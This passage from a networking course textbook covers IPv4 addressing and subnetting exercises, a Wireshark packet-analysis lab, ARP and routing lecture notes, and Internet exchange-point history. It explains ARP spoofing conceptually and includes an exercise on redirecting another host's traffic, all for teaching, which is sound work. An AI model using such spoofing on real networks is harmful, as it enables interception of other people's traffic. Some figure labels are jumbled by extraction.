A host has just been powered on and wishes to receive an IP address from the DHCP server. How can it send
a request over a TCP/IP network if it does not have an IP address and does not know the address of the DHCP
server?
If Time To Live (TTL) field in the header of an IP packet has the value 000000001, what will happen to this
packet when it travels to the next hop?
Provide for error checking between source and destination
Check that the headers from previous layers have been filled out correctly
Add up the bytes in the message and make sure it can fit in one packet
This field is no longer used for IP communications
As a network administrator you notice something fishy going on in your network. In order to diagnose the problem
you start sniffing packets using Wireshark and find an IP packet with the following header (shown here in
hexadecimal).
45 00 00 34
60 ad 40 00
3f 06 03 5d
83 78 a8 1f
83 78 28 aa
(a)
(b)
What version of IP is this packet using?
What is the source address?
7.
Consider IP address, 136.52.100.34/19.
(a)
What is this address’s network mask (in dotted decimal)?
(b)
What is this address’s network address?
(c)
What is this network’s broadcast address?
(d)
How many hosts can this network accommodate?
8.
In a brief sentence, explain what is meant by the Internet Protocol principle connectionless.
9.
True or False: An IP address is normally expressed in hexadecimal.
10.
Write the network address for IP address 146.25.129.17/20 in dotted decimal format.
11.
The purpose of the time to live field in an IP header is to (choose the correct answer):
(a)
Show the number of hops to the destination
(b)
Prevent a packet from endlessly traversing the internet
(c)
Translate a packet to classless routing (CIDR)
(d)
Amplify the network mask
305
12.
Which one of the following is NOT a principle behind the design of the Internet Protocol?
(a)
user-defined
(b)
best-effort
(c)
unreliable
13.
Fill in the blanks: An IP address is____bits long. When expressed in dotted decimal form, every ___ bits form an
octet. The integer value of a single octet can range from ____ to ____ .
14.
15.
In one sentence, state the purpose of a network mask.
Assume you are provided the IP address 128.32.14.2 and a network mask of 255.255.254.0.
(a) What is your network ID expressed in dotted decimal notation?
(b) Continuing from part (a), state the number of bits that can be used to assign host IP addresses.
(c) Continuing from part (b), determine how many valid host IP addresses you can assign on your network.
(d) Assume that host IP addresses are assigned sequentially from lowest to highest on your network. What is the last
valid IP address that can be assigned to a host on your network expressed in dotted decimal form?
16. Circle the best word, or fill in the blanks, to complete the statements below that pertain to IPv4 addresses.
 An IP address is a software / hardware address which is made up of 16 / 512 / 32 bits.
 An IP address consists of two parts, a ____________________ ID and a ____________________ ID.
 If all of the ____________________ ID bits of an IP address are zero, then the address is the network / broadcast
address.
 If all of the ____________________ ID bits of an IP address are one, then the address is the network / broadcast
address.
17.
Show all work:
(a) What is the network address of 156.143.10.55 / 21 ?
(b) How many hosts can be assigned a unique IP address on this network?
(c) What is the first available IP address that can be assigned to a host?
(d) What is the last available IP address that can be assigned to a host?
18.
Can private IPv4 addresses be routed across the Internet? If not, what is the purpose of private IP addresses? If so,
explain how they can be routed across the Internet.
19.
Answer True or False to each of the following statements:
(a) An IP address is a software address.
(b) IP addresses are used at the network layer.
(c) There are 6 bytes in an IP address.
(d) Once set, the IP address of a computer never changes.
20.
Select from the following those that are valid IPv4 network masks? (There maybe more than one correct answer)
(a) /45
(b) 255.255.128.0
(c) 128.255.255.0
(d) 255.255.240.0
(e) /16
21.
You are a network administrator and given the following block of addresses from your ISP:
137.18.129.128/27
(a) How many hosts can you support on this network?
(b) What is the first possible host ID?
(c) What is the last possible host ID?
(d) What is the broadcast address for your network?
22.
Suppose you know the first address and last address in a block of IPv4 addresses (i.e., you know the network address
and the broadcast address). Explain how you can determine the total number of IPv4 addresses in the block.
23.
Express the following IP address in dotted-decimal notation:
01010101 . 10000101 . 00110011 . 00011111
24.
Suppose you are given a block of IPv4 addresses with a prefix length of 14 – i.e., there are 14 bits in the network-ID
portion of your addresses. How many addresses are in your block?
25.
Express the mask /14 in dotted decimal notation.
26.
Express the mask 255.240.0.0 in slash notation.
306
27.
You wake up one morning, stagger over to your computer and exclaim: "Wow, one of the IP addresses in my block
happens to be 140.150.16.17/18 !" Overcome with excitement, you set out to determine the first and last
addresses in your block that can be assigned to hosts. What do you come up with?
28.
Consider the Time-to-live field in the IP packet header.
(a) Can the value stored in this field be equal to the decimal value of zero? Explain.
(b) Can the value stored in this field be equal to the decimal value of twenty? Explain.
(c) Can the value stored in this field be equal to the decimal value of three hundred? Explain.
29.
Using Wireshark, you examine the header of an IP packet, which starts out as:
45 00 00 4E
00 10 00 00
12 06 23 c5
etc., etc.
(a) How many bytes are in this IP packet's header?
(b) How many bytes are there in the data portion of this IP packet?
(c) How many more routers can this packet travel to before it is thrown away by a router?
30.
Suppose an IP packet's header has no options. Which fields of the header can change as the packet travels from router
to router? (Ignore the flag field and the fragmentation offset field.)
307
308
Security Exercise 13
Part I: Your IP Address
You learned today that all computers connected to the Internet have an alternative address in addition to the physical address.
This other address was referred to as IP address. We need IP addresses to communicate over the Internet. In fact: Every
computer on the Internet needs a unique IP address (in addition to its unique MAC address).
So, let’s begin by finding out our IP address. From the Windows command prompt, type ipconfig/all
Question 1. What is your IP address for your wireless LAN?
So we have an Ethernet address and an IP address. So, what again is an IP address? We mentioned that in order to make a
number of dissimilar networks "appear" to be a one single happy network, we must use a single global addressing for all people
on all networks. That’s where the Internet Protocol (IP) comes in. IP assigns to each computer a unique 32-bit IP address.
This IP address is a "software address"; it is not a hardware address. To send a packet over the Internet, we must use the
destination's IP address, not the physical address.
This point bears repeating: Your IP address exists in software only. Your computer’s IP address is in no way “burned in” to
the hardware, as your hardware address is. Tomorrow your computer might have a different IP address, but it will have the
same physical address.
To make IP addresses easy to read, they are expressed in dotted-decimal notation. Each 8 bits of the 32 bit address is expressed
as a decimal value, separated by periods. Let's review by answering a few questions.
Question 2.
State whether the following IP addresses are valid or not; for those that are invalid, state the reason.
(a) 129.11.11.239
(b) 221.34.8.9.20
(c) 193.131.28.253
Nothing good comes in life or
athletics unless a lot of hard
work has preceded the effort.
Only temporary success is
achieved by taking short cuts.
(d) 78.45.300.15
309
Part II: Packet Analysis
Start up VMware Workstation and power-on your Cyber2 VM. Then launch Wireshark be selecting:
Applications > Internet > Wireshark (as root)
Under File, Click Open and highlight the file named packets:
And then hit Open.
Recall that the top pane is the Packets List Pane. Starting at the left, we have the number (No) column (each packet that is
captures is sequentially numbered by Wireshark) followed by the Time column (which indicates the relative time that each
packet was received, with the first packet arriving at t = 0).
The next two columns indicate the source and destination IP addresses for the packet.
Question 3. What is the IP address of the computer that generated the 21 st packet?
310
The next column indicates which protocol is used in the packet. We have not discussed all of these in class yet, but some of
them may ring a bell from SI110.
The last column provides some additional information about the packet.
Let’s look at packet 5182.
Question 4. How many seconds into the packet capture was this packet sent?
Question 5. What is the IP address of the sender of this packet?
Question 6. What is the IP address of the receiver of this packet?
Hmm…so we can see who is talking to whom. (Details about communication that do not reveal the contents of the
communication are termed metadata.)
Now, let’s look at the Packet Details pane for this packet:
This shows the protocols used by this packet. So, for instance, we see that this packet used Ethernet, the Internet Protocol (IP)
and the Transmission Control Protocol (TCP). By clicking on the arrow sign we can expand and collapse each of the listed
protocols.
The bottom pane, the Packet Byte pane, shows the data in the selected packet (in this case, packet 5182) in hexadecimal.
Question 7. How many bytes of data are in this frame?
Now, let’s look at the Internet Protocol in more detail. Click the arrow sign next to Internet Protocol and you should see this:
311
Question 8. What version of the Internet Protocol (IP) is being used?
Question 9. IP uses a checksum for error detection. Did this packet pass the checksum?
The IP packet format consists of a header, followed by data. The format of just the header is:
Forouzan, Data Communications and Networking, 4th ed, 2007
Let’s find the start of the IP packet. Highlight the line that says Version 4 and the hex code should highlight in the bottom
window. Starting at this location, the packet is:
45 00
01 57 36 e3 40 00 3f 06 2c 04 83 78 a8 1f 83 78
28 aa 04 d9 0c 3b a9 5b 18 98 59 96 ad 43 50 18
f5 3c 5c 6f 00 00 17 03 01 00 60 6d f0 04 92 b6
d7 66 cd 9e d5 4c b8 17 f5 25 26 06 b5 eb b8 3e
c7 92 37 d3 28 36 78 8c 1e 7f 83 4f 6d 8a 24 7e
90 7d 88 ef 3d b4 ff e2 17 b7 42 67 6a 34 0b 43
43 9d 49 8e 48 2f 1b 91 fa 05 bf a5 8a 61 63 4c
Question 10. What is the meaning of the first hexadecimal number (4)?
The next hexadecimal number (5) indicates the length of the IP packet’s header in units of 4 bytes.
Question 11. How many bytes are in the header of this IP packet?
Question 12. Does your answer to Question 11 match the data provided in the Packet Details Pane?
Question 13. Write down the hexadecimal numbers that correspond to the Total Length.
Question 14. Write out the hexadecimal numbers in Question 13 as a binary number.
Question 15. Convert the binary number in Question 14 to a decimal (base 10 number).
The Total Length entry gives the size of the IP packet in bytes.
Question 16. Does the number you calculated in Question 15 match the data provided in the Packet Details Pane?
Is translating these hexadecimal numbers to decimal, and interpreting them, fun? Probably not, even for Computer Engineering
students. This data at the bottom is called the “raw hex” or the “hex dump.” There was a time when this was what we “saw”
when we used a packet sniffer. One of the nice things about Wireshark is that it provides a translation of the hex dump, and so
we will usually not have to pay attention to the bottom pane. The bottom pane is what has actually been sniffed…remember,
everything is bits!
Note that at the right of the hex dump, we see what looks like gibberish. This represents the ASCII translation of what is in
the hex dump. Since most of these hex figures are not intended to be ASCII values, the result looks like random characters.
(Note that a nonprintable ASCII character translates as a period.)
Every so often, though, we will be able to see usable text in this field. For example: Look at packet 136, which is a DNS
request.
Question 17. Looking at the bottom pane (the “raw” hex dump), what name do you suppose the user is requesting
the IP address for?
312
Notice that this info is also available in the middle pane. The info in the middle pane is an attempt to provide a high-level
best guess snapshot about the packet.
Look at frame #4955.
Question 18. What is the source IP address?
Question 19. What is the meaning of this source IP address?
313
314
Security Exercise 13 Answer Sheet
Name:
Question 1:
Question 2:
(a)
(b)
(c)
(d)
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
315
Question 11:
Question 12:
Question 13:
Question 14:
Question 15:
Question 16:
Question 17:
Question 18:
Question 19:
316
Chapter 14: Routing Part I
Objectives:
(a) State the purpose of the Address Resolution Protocol and describe its role in facilitating communication.
(b) Describe the mechanism for spoofing an ARP cache with misinformation.
(c) Describe how routing works at the network layer.
(d) Construct an optimal routing table for a router given a network diagram and using address aggregation.
(e) Describe how to make a routing decision based on the longest mask matching principle given a network diagram and a
destination IP address.
If you find the above cartoon outlandish, wait till you read this:
http://www.thefiscaltimes.com/Articles/2013/10/08/2-Billion-NSA-Spy-Center-Going-Flames
I. Address Resolution
We mentioned that for internet to work effectively, we must have an agreed upon global addressing scheme. Last lecture, we
discussed the addressing scheme used by the Internet Protocol, and mentioned how it is employed to make a group of different
networks appear to be a single network. This global address is the IP address.
Thus, from the lofty perspective of the network-layer, everyone using the network can be identified by their IP address, and
everyone using the network can interpret IP packets.
But… Wait a minute… Different physical networks do in fact exist. When sending data, the software at the network layer
works with IP addresses but, unfortunately, the data link layer and the physical layer hardware do not speak IP; i.e., the physical
and data link layers do not understand IP addresses or IP packets.
To be clear: A data link frame must use the frame format and addressing scheme for the specific technology or product in use.
Ethernet, for example, only understands 48-bit Ethernet addresses properly packaged within Ethernet frames. Put another way:
If we were somehow to place an IP packet directly over Ethernet, the Ethernet protocol would not know what to make of it.
So, IP addresses must be translated to data link layer addresses before a frame can be sent. And the IP packet itself must be
placed (encapsulated) within the data field of the Ethernet frame.
Translating from an IP address to a hardware address is called address resolution.
1. Address Resolution Schemes. Two address resolution techniques exist:
A. Table Look-up. A network administrator could set up a table that provides the IP address to data link layer address
associations:
IP address
Data link layer address
317
When the software has an IP address and needs to determine the corresponding data-link address, it consults the table.
Unfortunately, if you ask a network administrator to maintain such a table for a large, complex and dynamic network, they
will want to kill you.
B. Message Exchange. Consider this scheme instead: A computer that needs to translate an IP address to a data-link address
sends a message requesting this information. This request essentially says: "I want to send data to the user with IP address
x; does anyone know the data-link layer address of the user with IP address x."
We presume that each user knows their own Ethernet address and their own IP address. Another computer replies with
the correct association. This reply essentially says: "The user with IP address x has data link address y."
The respondent providing the correct association can be the target computer (the computer that owns the IP address x) or
a server that stores the full network association table.
This technique is used by the Internet's Address Resolution Protocol.
2. The Address Resolution Protocol (ARP) The Address Resolution Protocol (ARP) has two message types:
 A request message containing an IP address for which we want a data link layer address. An ARP request is broadcast
to all computers on the network.
 A response message, which contains the IP and matching data link layer address. Only the computer that corresponds
to the IP address sends a response with its data link layer address. The response is not broadcast, it is sent addressed
only to the user that sent the request.
The main use of ARP is to associate a logical software address with a hardware address; that is: find the hardware address of a
node when its IP address is known. Since these days most hardware addresses are Ethernet, ARP finds most use in associating
32 bit IP addresses to 48 bit Ethernet addresses.
318
Let's refine the pictures above, in terms of ARP. Suppose we have a network with User A, User B and three other unnamed
users. User A wants to send a packet to a user with IP address 142.33.68.23. To send the information, User A must learn the
Ethernet address for the user with IP address 142.33.68.23. User A sends an ARP request to all users in the local network.
Practice Problem 14.1
How can an ARP request be sent to all users in the local network?
Solution:
This ARP request is received by all users. Each of the users examines the IP address in the ARP request to see if that matches
their IP address. Let's say that User B has IP address 142.33.68.23. User B (and only User B) would send an ARP reply
containing his Ethernet address. This reply is not broadcast; it is sent in a frame addressed to User A's Ethernet address.
Note that ARP allows the seamless addition of new hosts while avoiding the need for a centralized database containing IP
address to Ethernet address pairings.
3. ARP Caching Most computer network communication involves a series of packet exchanges. During the first exchange,
a host learns the target host’s Ethernet address. But, what does it do for the second exchange? Suppose, in the picture above,
that User A has to send more data to IP address 142.33.68.23 a moment after the first exchange. It would be wasteful to have
to go through the whole ARP Request/ARP Reply rigmarole all over again.
To avoid excess ARP traffic, each user maintains a table of recently received IP address – Ethernet Address associations in a
table called an ARP cache. In the example above, User A would make the following entry in its ARP cache:
142.33.68.23
:
23:ef:40:7d:45:77
Before sending an ARP request, a user first checks its ARP cache to see if it already has the Ethernet address that it needs (i.e.,
the Ethernet address for a specific IP address).
ARP table entries can become incorrect without warning. For this reason, each entry in the ARP cache has a timer associated
with it. When the timer expires, the entry is deleted from the cache. Typical values for this timeout are 10 minutes.
Practice Problem 14.2
The Address Resolution Protocol works at which two layers?
Solution:
319
Figure 21.3 Encapsulation of ARP packet
4. ARP Packet
An ARP request is encapsulated in an Ethernet frame as shown below.
Forouzan, Data Communications and Networking, McGraw Hill, 2007
Figure
21.2
packetby a specific entry in the Ethernet frame's Type field. The ARP packet format is
This frame
is identified
as an ARP
ARP message
shown below:
21.5
Forouzan, Data Communications and Networking, McGraw Hill, 2007
Practice Problem 14.3
How21.4
many bytes are in an ARP Request packet? How many bytes are in an ARP reply packet?
Solution:
Several of the fields in the ARP Request and ARP Reply will always be the same.
 The first field is the hardware type: for Ethernet, this will always be 1.
 Second field is the network layer protocol type: for IP this is always 0800 16
 The third field is the length of the hardware address in bytes: for Ethernet, this will be 6
 The fourth field is the length of the network layer protocol address in bytes: for IP this is always 4
An ARP Request is differentiated from an ARP Reply by the entry in the Operation field: A 1 is placed in this field for ARP
Request packets, and a 2 is placed in this field for ARP reply packets.
Let's look at an example in gory detail. Suppose, in the picture below, User A has IP address N1 and Ethernet address L1 and
that User System B has IP address N2 and Ethernet address L2.
320
Suppose User A wants to send important information to his friend, who he happens to know has IP address N2. But User A
does not know the proper Ethernet address. (Recall that User A cannot just put his information in an IP packet, and just transmit
the IP packet. User B's Network Interface card (NIC) expects to see an Ethernet frame. It will not know what to make of an
IP packet.)
User A would encapsulate an ARP request inside an Ethernet frame as shown below.
L1
Note that in the picture above, the letter M is used to denote the Ethernet broadcast address FF:FF:FF:FF:FF:FF. The
broadcast address is placed in the field for the destination address in the Ethernet frame. Thus all other users—User B, User
X, User Y and User Z—will received this frame and pass it up to the network layer for examination.
Note that User A has included his own Ethernet address and IP address (L1 and N1) in the ARP request message. Why would
he do this, if his goal is simply to determine the Ethernet address for the user with IP address N2?
The reason is this: If User A needs to send data to User B, it will very often mean that User B will have to send data to User A
soon thereafter. Most data exchanges are, after all, interactive. Thus, User B will likely need to know User A's IP addressEthernet address association. To save User B the trouble of having to send her own ARP request (for A's information) in the
future, User A will include its IP-Ethernet address pairing in its request for B's information.
Notice that all hosts on the network immediately learn IP address – Ethernet address association for User A. Thus all users
make the following entry in their ARP cache:
N1 : L1
Now, User B recognizes that the target IP address in the ARP Request is her IP address. Thus, it is User B's Ethernet address
that is being requested. This, User B will craft an ARP Reply packet as shown below.
L2
N2
L1
N1
L1
L2
To complete the story: After User A receives the ARP Reply from User B, User A will send the IP packet to User B by placing
the IP packet in the data field of an Ethernet frame.
321
Practice Problem 14.4
In the protocol layering model of TCP/IP, how is a host identified:
(a) At the Network Layer
(b) At the Data Link Layer
Solution:
Practice Problem 14.5
What are the two types of messages used by the Address Resolution Protocol?
Solution:
Practice Problem 14.6
When a sender wants to find out what MAC address corresponds to an IP address, to which MAC address would she send an
ARP request? (Circle the appropriate answer(s))
(a) 0.0.0.0
(b) ff:ff:ff:ff:ff:ff
(c) 255.255.255.255
(d) 00:00:00:00:00:00
Solution:
Practice Problem 14.7
Can an ARP Reply be sent without an ARP request?
Solution:
5. ARP Spoofing A major flaw with ARP is that an ARP Reply message can be sent without a preceding ARP Request. To
see what problems might ensue, consider again our local network, for which we now know User A and User B's IP address and
Ethernet address pairing. We also indicate the IP address-Ethernet address pairing for User X, who is actually the Evil User!
Suppose User X (Evil User) sends an ARP Reply that, for practical purposes, says: IP address N2 is paired with Ethernet
address L3. Notice that this ARP Reply is not preceded by an ARP Request from any user. Nevertheless, all other users—
trusting souls that they are—will update their ARP cache with the entry:
N2
:
L3
Note that this information pairing is not correct: the correct Ethernet address for User B (who has IP address N2) is L2, not
L3. So…why would the Evil User have sent this bad gouge to all users on this local network, corrupting everyone's ARP
cache?
322
He did this because he's EVIL!
24
Suppose User A now wants to send an IP packet to his friend (User B) with IP address N2. User A will check his ARP cache
and see that the packet should be encapsulated in an Ethernet frame addressed to … L3 (Evil User). Thus the IP packet intended
for User B will instead be routed to the Evil User.
Sending an ARP Reply with an incorrect IP address–Ethernet address pairing with the intent to misdirect traffic is termed ARP
spoofing. If an attacker with Ethernet address Attacker's Ethernet Address wants to steal traffic from a user with
IP address Victim's IP address, he sends an ARP Reply saying:
IP address Victim's IP address
Attacker's Ethernet Address.
is associated with Ethernet address
Practice Problem 14.8
One of your crewmembers has downloaded ARP-spoofing software.
(a) What does ARP spoofing software do?
(b) What is one malevolent purpose he could use this for?
Solution:
II. Sending IP Packets to Users on Your Own Network
If a destination IP address is in our same network, we directly deliver the IP packet. This is called, shockingly, direct delivery.
In direct delivery, the destination is on the same network as the sender. No routers are involved as intermediaries.
How does the sender know the destination is on the same network?
The IP addresses of all machines on a single network will have the same network ID. So, the sender looks at the destination’s
network ID. Thus, a host can easily see if another host is directly connected.
How do we route to other hosts on the same network? Simple! The sender encapsulates the datagram in a data link frame,
binds the destination IP address to a physical hardware address, and sends the resulting frame directly to the destination.
Practice Problem 14.9
Your IP Address is 10.16.58.92/27. Can you use direct delivery to send messages to the host 10.16.58.129?
Solution:
Practice Problem 14.10
Your IP Address is 10.226.58.15/24. Could you use direct delivery to send messages to the host 10.226.58.229?
Solution:
24
Note that an ARP reply when properly used is always sent to an individual user. Malicious ARP replies can be sent to the
broadcast address.
323
III. Routing
If the destination IP address is not in our same network (i.e., if it does not have the same network ID), we cannot directly deliver
the IP packet. We must route the IP packet using routers: The source computer sends the IP packet to the first router, who
passes the IP packet to the next router, and so forth, until the final router delivers the IP packet to the destination.
Routers operate at the network layer; indeed, one of the key network layer functions is routing: choosing an appropriate path
for packet flow.
Forouzan, Data Communications and Networking, McGraw Hill, 2007
1. Routing Tables We route IP packets by using a routing table, which must (somehow) convey the route to the final
destination. Each entity—host or router--maintains an IP routing table which provides information on how to reach possible
destinations. A host or router consults a routing table when making routing decisions.
Consider this naïve proposal for the use of a routing table: Maintain in each entity a routing table which lists every possible
destination IP address, and the full path needed from the entity to reach each possible destination. In this scheme, a routing
table might have billions of entries (since there might be billions of IP addresses in use at any time), and each of these entries
would have multiple pieces of data associated with it (the full route to the destination for this entry in the table).
This approach is not practical; the resulting routing tables would be gargantuan. Think of how slow routing would be if the
decision on where to send each and every packet required consultation with a table of billions of entries. Moreover, think of
the problem of constantly updating these huge tables as IP addresses are reassigned to different hosts throughout the Internet.
So, early on, three clever ideas were employed to make routing tables as small as possible.
First clever idea: For each destination IP address, only store in the routing table the IP address of the next hop.
Consider the small network below which shows three networks interconnected with two routers: R1 and R2. Each of the three
networks has many hosts connected to it, but, for simplicity, we only show two hosts: Host A and Host B.
Figure 22.2 Route method versus next-hop method
Let's consider the routing table for Host A, and, in particular, let's look at the entry for Host B. Originally, the entry for Host
B would have been:
This entry means: To reach Host B, send the packet to router R1, who will in turn send it to router R2, who will then send it to
Host B.
324
2.2 Route method versus next-hop method
The first clever idea recognizes that a host or router does not need to maintain information in its routing table about the full
path to a destination. Host A's routing table entry for Host B can be reduced to:
Router R1 will have its own routing table that will tell it that the next hop for destination Host B is router R2. R2 will have its
own routing table that will tell it that the next hop for destination Host B is direct delivery to Host B.
Second clever idea: Instead of having routing table entries for each and every destination host, store routing table entries
for destination networks.
Consider the network below which shows a portion of the routing table for Host A. Note that Host A has entries for Hosts B,
C and D.
Note that all three of these hosts (B, C and D) are on the same network (Network 2). All packets delivered to these three hosts
will be delivered to the same network. Thus, we can collapse the three entries for B, C and D into a single entry in the routing
table.
All entities that connect to the same physical network share a common prefix (the network ID). Thus, routing tables only need
to contain network prefixes, and not complete IP addresses. Thus routing decisions are made based on table lookup where
routing tables keep only the network portion of the IP addresses (so the size of the routing table is, at worst, proportional to the
number of networks, not the number of hosts).
Third clever idea: Default Routing
To avoid large routing tables, group multiple destinations into a single default case. That is, when we want to route a packet,
we first check to see if the destination network ID is in the routing table; if not, send the packet to the default router.
Consider Host A in the network below:
325
We see that Host A has a connection to Network 2 via router R1, and has a connection to the rest of the world via router R2.
It would make sense for Host A to have an entry in its routing table for Network 2. But it would make no sense for Host A to
have any entries for any other specific networks since any destination other than Network 2 will always be routed via router
R2. So, by default, if the destination is not Network 2, we should send the packet to R2.
Default routing is most useful when a host has a single connection to the Internet. Then routing is easy: If the destination's
network ID does not match mine, send the packet to the default router.
Summary
.5 Simplified
forwarding module in classless address
So, let's summarize the decisions that are made in routing, and show the form of the routing table.
Step 1. A packet shows up at a router X, needing to be routed to its final destination.
Step 2. Router X examines the destination's IP address and extracts the network address. In order to extract the
network address, the routing table for each network address must have the associated mask. So, a column
for the mask is included as the first column in the routing table for Router X, shown below.
.5 Simplified forwarding module in classless address
So, Router X applies the mask in the first line of the table to the destination IP address:
.5 Simplified forwarding module in classless address
and checks to see if the extracted network ID matches the Network address shown on the first line:
.5 Simplified forwarding module in classless address
If it matches … Joy! … send the packet to the Next-hop address which is on this Interface:
326
If it does not match, repeat the process for the second line of the routing table.
Practice Problem 14.11
Figure 22.6 Configuration for Example 22.1
(Based on an example in Forouzan, Data Communications and Networking, McGraw Hill) The router R1 in the figure below
connects the four different networks shown. The four networks connect to the router’s four interfaces, labeled m0, m1, m2
and m3.
180.70.65.128/26
180.70.65.135/26
m3
(a)
Why does the router R1 have 4 different IP addresses?
Solution:
(b)
How would you verify that the router address 180.70.65.135/26 on the m0 interface is indeed on the network
180.70.65.128/26 ?
Solution:
(c)
Your friend says: "Wait just a minute!
The two different networks 180.70.65.128/26 and
180.70.65.192/26 look very similar. Are these really two different networks…i.e., are these really two nonoverlapping blocks of addresses?" How would you reply?
Solution:
(d)
Construct the routingTable
table.
22.11
22.1 Routing table for router R1 in Figure 22.6
327
We will see later that it is best to order the table by decreasing mask value…but let's proceed.
(e)
Suppose an IP packet with destination IP address 180.70.65.140 arrives at router R1. Explain how the routing
table is used to make a routing decision.
Solution:
(f)
Suppose an IP packet with destination IP address 201.4.22.35 arrives at router R1. What does it do?
Solution:
Figure 22.7 Address aggregation
2. Address Aggregation Consider the network below, examining also the routing table for router R2.
From Forouzan, Data Communications and Networking, McGraw Hill, 2007
328
s aggregation
R1
R1
R1
R1
m0
m0
m0
m1
Notice that the four addresses are disposed of in the same way: place on interface m0. Let's look at just the last octet of these
four network addresses:
140.24.7.0 last octet:
0 0 0 0 0 0 0 0
140.24.7.64 last octet:
0 1 0 0 0 0 0 0
140.24.7.128 last octet:
1 0 0 0 0 0 0 0
140.24.7.192 last octet:
1 1 0 0 0 0 0 0
22.17
mask
Note that the first two bits in this fourth octet are part of the mask (which is /26). But examine these two bits carefully! Any
values of these two bits (00, 01, 10, 11) yield the same result: Send it out on interface m0. Since the values of these two bits
do not need to be considered (since they can take on any of the four possibilities while yielding the same routing decision) we
can move the mask up to /24 and consolidate these four entries on a single line:
R1
329
Practice Problem 14.12
Given the following diagram:
Use the technique of address aggregation to create the routing table for Router R2 with the minimum number of entries.
Solution:
330
3. Longest Mask Matching Let’s consider now the following network previously referenced, where Organization 4 has split
off while keeping its IP address block and is accessed now via router R3.
ching
ching
ching
ching
2.18
Router R2 has a routing table pictured below where Address Aggregation has been applied to the networks of Oraganization
1, Organization 2 and Organization 3, and are now listed under mask /24.
R1
R3
Suppose a packet with destination address 140.24.7.200 arrives at router R2. (It is left as an exercise for the student to
show that address 140.24.7.200 belongs to network 140.24.7.192/26.) What happens? By applying the mask listed in the
routing table for R2, we see the IP packet is routed to the wrong location – to router R1. How can we fix this problem?
k
k matching
matching
To prevent this problem, routing tables are sorted from longest mask to shortest mask. This principle is called longest mask
matching. So the corrected routing table for R2 would be:
R3
R1
331
332
Problems
1.
Given the following ARP table, make the necessary change(s) to cause all Ethernet traffic destined for 192.168.14.10
to flow to you (192.168.14.13) instead.
IP
192.168.14.8
192.168.14.9
192.168.14.10
192.168.14.12
192.168.14.13
192.168.14.21
192.168.14.25
MAC
AA:BB:CC:DD:EE:FF
AA:BB:AA:BB:AA:BB
CC:DD:CC:DD:CC:DD
EE:FF: EE:FF:EE:FF
A4:B5:C6:D7:E8:F9
C6:D7:C6:D7:C6:D7
E8:F9: E8:F9:E8:F9
2.
Why is the destination hardware address field of an ARP request message filled with all zeroes?
3.
Why is an ARP request message sent to the broadcast hardware address?
4.
Combine these three blocks of addresses into a single block:
18.45.24.0/26
18.45.24.64/26
18.45.24.128/25
5.
Construct the routing table for router RB in the picture shown below.
6.
Suppose router RB in Problem 5 receives a packet with a destination address 3.3.3.38. Explain how the router uses
its routing table to decide where to send this packet.
7.
What feature of the Address Resolution Protocol makes it particularly vulnerable to a spoofing attack?
333
334
Security Exercise 14
Part I: The Geography of the Internet
At this point you should appreciate that the Internet is, to a great extent, a large collection of routers along with the
interconnecting media (copper wires, fiber optic cables, and, as we will see later in the course, wireless links). We have talked
about the Internet (its routers, its interconnecting media) within the confines of the lecture notes and within the confines of
mathematical algorithms. Which may leave you wondering: Where is the Internet physically? And what does it look like
geographically?
The original vision for the Internet was that it would be a small enterprise, and would be appear somewhat flat: each router
would be just as important as any other router. The original intent was that the network would be fully distributed and
decentralized so that it could survive a nuclear war. Stated another way, the original intent was that the Internet would have
no routers serving as choke points that could serve as single points of failure. If—the theory went—every router is connected
to the same number of other routers, then every router is equally unimportant to the survival of the Internet. So, with this vision
in mind, we might expect the number of "routers per square mile" to be roughly the same.
This is not how things turned out, to say the least. The Internet has, in fact, physical focal points—single buildings where a
large number of routers are collocated—single buildings where a large amount of the Internet's traffic funnels through.
To see how this came about, let's go waaaaaay back to 1980. A USNA grad was President, disco was dying out, and the
Internet (then called the ARPANET) looked like this:
In 1980 the listing of everyone on the Internet totaled 5000 names. These were names, not computers. The number of
computers with Internet access was far fewer.
In the mid-1980's the Internet (i.e., ARPANET) shifted to TCP/IP. In 1990 the ARPANET was retired and the Internet, as
such, was then run by the National Science Foundation, and renamed NSFNET. The National Science Foundation decided that
the NSFNET should only be accessed by lofty high-minded academics, and not by grungy businesses that are out to make a
seedy profit by providing services to the unwashed masses. As a result of the National Science Foundation's Acceptable Use
Policy, businesses found they were not permitted to connect to each other by using the NSFNET.
What to do? What to do? Businesses decided to bypass the NSFNET and directly connect to each other! If Business A wanted
to connect to Business B, the solution was to run a physical cable between a router in Business A's network to an intermediate
router, and run a cable from a router in Business B's network to this same intermediate router. The only problem, then, was to
find a location where one of Business A's routers and one of Business B's routers could be placed adjacent to this intermediate
router. Once all three routers are collocated, running the two cables to connect Business A and Business B would be easy.
Along came a company named MFS. MFS purchased a building, installed a very expensive (very capable) router and advertised
itself as Metropolitan Area Exchange-East (MAE-East). MFS basically advertised: "Bring your router to MAE-East, and we
will connect your router to our central router (thus connecting everyone's routers together)." The response to this advertisement
was overwhelming: Companies showed up at MAE-East, Internet Service Providers showed up at MAE-East—basically,
335
anyone who wanted to interconnect to others showed up at MAE-East. By 1997, half of the Internet's traffic went through
MAE-East.
The surprising thing is that MAE-East is not a logical location that exists in theory. MAE-East is the fifth floor of 8100 Boone
Boulevard in Tysons Corner Virginia (with equipment overflowing into an adjacent parking garage). The original notion of
the Internet being geographically distributed and spread-out was over; there were now just a few chokepoints through which
all the Internet's traffic passed.
McDonald’s
MAE-East
1997: 50% of Internet traffic
goes through the fifth floor of
this building.
NSFNET eventually dissolved and sold off its components, and the Internet in turn evolved into a collection of independent
networks—termed autonomous systems—all interconnected to each other through locations such as MAE-East. Today, in
fact, the Internet is a collection of about 42,000 independent networks (again—autonomous systems is the proper term),
interconnected to each other.
But we are getting a little ahead of ourselves—let's go back to the 1990's! In the late 1990's, organizations decided that it was
technologically better to directly connect their autonomous systems to each other without a middleman router (such as that
provided in MAE-East). Digital Equipment Corporation purchased a building at 529 Bryant Street in Palo Alto California,
christened it the Palo Alto Internet Exchange (PAIX) and advertised: "Bring a router connected to your autonomous system to
529 Bryant Street, and we will directly connect it to other autonomous systems in our building." By 2000, PAIX was the
Internet's main connectivity hub. 529 Bryant Street? What's that you ask? That would be this nondescript building:
336
Gee. What a nice building.
I wonder what goes on
inside?
Surprisingly, even today this unremarkable building remains one of the Internet's most critical locations, one of the few major
key connectivity nodes. Another key focal point, where various autonomous systems are connected together is MAE-West at
55 Market Street in San Jose. By some estimates, a third of the nation's Internet traffic goes through this single building:
The surprising point bears emphasizing: There exists a discrete set of geographic locations through which a large percentage
